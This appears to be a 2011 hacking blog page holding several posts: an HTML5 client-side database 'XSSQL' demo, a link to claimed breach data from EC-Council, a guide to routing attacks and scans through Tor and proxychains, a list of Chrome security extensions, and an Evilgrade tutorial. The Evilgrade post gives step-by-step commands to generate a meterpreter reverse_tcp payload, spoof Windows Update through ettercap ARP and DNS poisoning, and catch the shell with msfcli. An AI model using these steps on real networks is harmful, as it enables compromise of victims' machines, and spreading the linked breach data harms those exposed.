Jul 16, 2011

HTML 5 - XSSQL attack

Html 5 brings a lot of new features to the web. One of its features is SQLite - a client side database engine which allows storage of data on the client side. Databases can be created and queried by the JavaScript.
It is pretty clear that many developers would use the opportunity to store information on the client side. The risk will be high if they use this repository and store their sensitive information such us user passwords, session ids, credit card numbers etc.
In case of XSS vulnerability in such website it would be possible to query these databases via JavaScript.
I even have a name for this attack - XSSQL :-) funny as well as concerning ... Eventually, XSS attacks still remain common and even more powerful with the ability to query client side databases and steal sensitive information.
HTML 5 - SQLite Example
  1. <script>  
  3. function db1()  
  4. {  
  6. if (window.openDatabase)  
  7. var db = openDatabase('yossidb''1.0''attack this db', 2 * 1024 * 1024);  
  9. db.transaction(function (tx) {  
  10.  tx.executeSql('CREATE TABLE IF NOT EXISTS users (id unique, username, password)');  
  11.  tx.executeSql('INSERT INTO users (id, username, password) VALUES (1, "user1","bbbbb")');  
  12.  tx.executeSql('INSERT INTO users (id, username, password) VALUES (2, "user2","password")');  
  13.     tx.executeSql('INSERT INTO users (id, username, password) VALUES (3, "user3","username")');  
  14.  tx.executeSql('INSERT INTO users (id, username, password) VALUES (4, "user4","another")');  
  15.  tx.executeSql('INSERT INTO users (id, username, password) VALUES (5, "user5","fighter")');  
  16.  //tx.executeSql('DROP TABLE users');//SELECT * FROM users  
  17. });  
  18. db.transaction(function (tx) {  
  19. tx.executeSql(sql.value, [], function (tx, results){  
  21.   var len = results.rows.length, i, resultsOutputUsers="",resultsOutputPasswords="";  
  22.   for (i = 0; i < len; i++) {  
  24.  if (results.rows.item(i).username!=null)  
  25.  {  
  26.   resultsOutputUsers = resultsOutputUsers + results.rows.item(i).username + "<br/>"  
  27.   resultsOutputPasswords = resultsOutputPasswords + results.rows.item(i).password + "<br/>"  
  28.  }  
  29.  document.getElementById("div1").innerHTML = resultsOutputUsers;  
  30.  document.getElementById("div2").innerHTML = resultsOutputPasswords;  
  32.   }  
  33.   }  
  34. )});  
  35. }  
  36. </script> 

Source:  http://yossi-yakubov.blogspot.com/2011/07/html-5-xssql.html

If you like my blog, Please Donate Me

ECCOUNCIL was hacked again.

After couple months ago, Eccouncil was hacked with SQL Injection( I don't sure about that). Now I get the rumor that it was hacked again. Please see the detail here.

Link: http://gaysec.net/gay/eccouncilacademy.org.txt

If you like my blog, Please Donate Me

Jul 14, 2011

Howto: Attacking through proxies

This post will tell you "How to use attacking tool with proxies".

 1. Attack through Tor
     1.1 Start Privoxy and Tor service.
         $ /usr/sbin/privoxy  /etc/privoxy/config
         $ /usr/bin/tor
     1.2  Create tunnel to the Tor service with socat
         $ socat TCP4-LISTEN:8080,fork SOCKS4:,socksport=9050

     We're ready to attack or scanning with Nessus or any attack tool to target.com with specified the target-hostname to

 2.  Scanning through Tor with proxychain
     2.1 Set the configure about Tor in /etc/proxychains.conf 

     2.2  Start Tor Service
           $ /usr/bin/tor 
     Now you can scanning port like this. proxychain nmap -sT targetip.com

If you like my blog, Please Donate Me

Chrome Extensions for Security Professional

During Recent days we have seen a phenomenal increase in usage of Google Chrome Browser, however Security Professionals are still looking at Firefox for there day to day life usage, the basic reason behind it is large set of firefox extensions backing it up, we have also custom builds like OWASP Mantra doing the round.
So for those who love using Google Chrome and still miss the large plugin base here is a list of must have plugin set for the Security professional’s.
Note : Usage could be offensive and defensive both, its upto the user to decide. the content here is for informational purpose only
CAUTION : LONG POST …. continue below only if you can give time coz this post is large.
Find below list of plugin’s i found to be useful :
I have added details from chrome store and where ever found necessary I added my own comments
Web developer toolbar of firefox in its full glory.
Encoding/Decoding Plugin for various types of encoding like base64, rot13 or unix timestamp conversion
Xss Detection and protections tools
Request Maker is a tool for penetration testing. With it you can easily capture requests made by web pages,
tamper with the URL, headers and POST data and, of course, make new requests.
Request Maker only captures requests sent via HTML forms and XMLHttpRequests
Edit This Cookie is a cookie manager. You can add, delete, edit, search, protect and block cookies
Simplistic Port scanner doing a simple port scan for well known ports.
Whois Information display within chrome browser
For those who don’t like Developers tools @ chrome and want to keep sync with good old firebug
Google Chrome extension that lets you quickly view HTTP Response Headers of a URL.
See geolocation, DNS, whois, routing, search results, hosting, domain neighbors, BGP and ASN info of every IP address (IPv4 & IPv6).
A clever extension that provides a high degree of ‘NoScript’ like control of javascript, iframes, and plugins on Google Chrome.
A nice drop in replacement for Foxy Proxy and very good in working.
Note of caution : if using on windows this also switches the proxy settings for IE.
Session Manager lets you save sessions of your opened tabs and windows, and to quickly re-open them whenever you like.
Swap cookies between two accounts
Make HTTP requests from you browser and browse the response.
Helper for web developers for creating custom HTTP requests.
Tools like ping, tracert, W3C validator, dns blackhole list, dns lookup, domain neighbors and whois information.
Displays DNS records for the current page.
Grease Monkey drop in replacement
Displays latest 5 of exploitdb.
Displays the technologies used in the website, Frameworks, CMS, scripting etc
Perform a Websecurify scan inside your browser.
Uses Norton SafeWeb API but we are NOT affiliated with Symantec!
QR & other BARcodes images in one click Decoding. Also can Encode selected text or current URL to QR code in one click, like others.
Supports upto 50 different services you can expand any url you receive before clicking on it and following the link.
Displays the Web server of the current page.
Note : this may break some pages.
This version allows to see asterisk and hidden fields
Adds one-click Google Safe Browsing diagnostic to your toolbar

Source: http://blog.anantshri.info/chrome-extensions-for-security-professionals/

If you like my blog, Please Donate Me

Jul 13, 2011

Hacking with Evilgrade on Backtrack5

           After install evilgrade on Backtrack5(Tutorial how to install evilgrade on Backtrack5). Now we try to use it. And this tutorial, we will use the new Metasploit tool name's "msfvenom" to create the shell and use it to pwn victim. You can download this tutorial document and my ettercap-ng that was compiled by myself in the last of this post.

Attacker IP: [Backtrack 5 Gnome Desktop 64Bit]
Victim IP: [Windows XP SP2]

1. Go to path of evilgrade and run it.
   $ cd /pentest/exploits/isr-evilgrade
   $ ./evilgrade

2. After load all modules, you can list all modules with command.
   evilgrade> show modules

3. Pick the modules that you want to spoof, in this tutorial I pick the "winupdate". to pwing victim machine who want to update his windows 
   evilgrade> configure winupdate

4. Show options of this module.
   evilgrade(winupdate)> show options

5. Set the agent for run when victim request windows update. This step, we use msfvenom to create and encode the payload.
   evilgrade(winupdate)> set agent '["/pentest/exploits/framework3/msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST= LPORT=445 -f exe  1> <%OUT%>/tmp/windowsupdate.exe<%OUT%>"]'

6. Make sure that you don't have DNS service(port 53) on the host and the same port of LPORT in step#5 don't use.

7. Start the evilgrade server.
   evilgrade(winupdate)> start

8. Edit and set spoofing DNS resolving of "windowsupdate.microsoft.com","update.microsoft.com","www.microsoft.com","go.microsoft.com" in /usr/share/ettercap/etter.dns with any tool editors, like this picture.

9. Run ettercap with -G option for GUI.
   $ ettercap -G

10. Go to Sniff -> Unified Sniffing

11.Choose the interface you want to sniff.

12. Enable DNS Spoofing plugin with go to Plugins -> Manage the Plugins -> Double Click "dns_spoof"

13. Scan machine in the same network with go to Hosts -> Scan for hosts

14. View the hosts in network and set the victim with go to Hosts -> Hosts list -> Click Gateway IP and [Add to Target 1] -> Click Victim IP and [Add to Target 2]

15. Start to attack with go to Mitm -> Arp poisoning -> Click Sniff remote connections

16. Start Sniffing with go to Start -> Start Sniffing

*** If you get the message "Dissector "dns" not supported" from ettercap, fix with this tutorial
  1. Get the source from http://ettercap.sourceforge.net 
  2. Extract it with tar xzvf ettercap-ng-0.7.3.tar.gz

  3. Edit configure file
      -  in line 29472: ac_cv_search_dn_expand="-lresolv"
      -  in line 29669: if true; then
      -  in line 29676: ac_ec_dns=yes

  4. Edit src/ec_log.c file
      -  in line 193: fd->fd = open(filename, 0_CREAT | 0_TRUNC | 0_RDWR | 0_BINARY, 0666);
  5. Save and exit

  6. Compile and install it with ./configure && make && make install
  7. Change DNS Record in /usr/local/share/ettercap/etter.dns 

Source: http://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwebcache.googleusercontent.com%2Fsearch%3Fq%3Dcache%3AONv78qOlYGkJ%3Aunknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20%2520http%3A%2F%2Funknowndebian.free.fr%2Fwordpress%2F%3Fp%3D20

17. Use Metasploit command's msfcli to create listening service from victim machine.
      $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=445 LHOST=

18. In the victim machine, Try to update windows. it will redirect from windowsupdate.microsoft.com to Attacker machine. And popup for victim to download update file.


19.  When victim run the update file, we will get the meterpreter.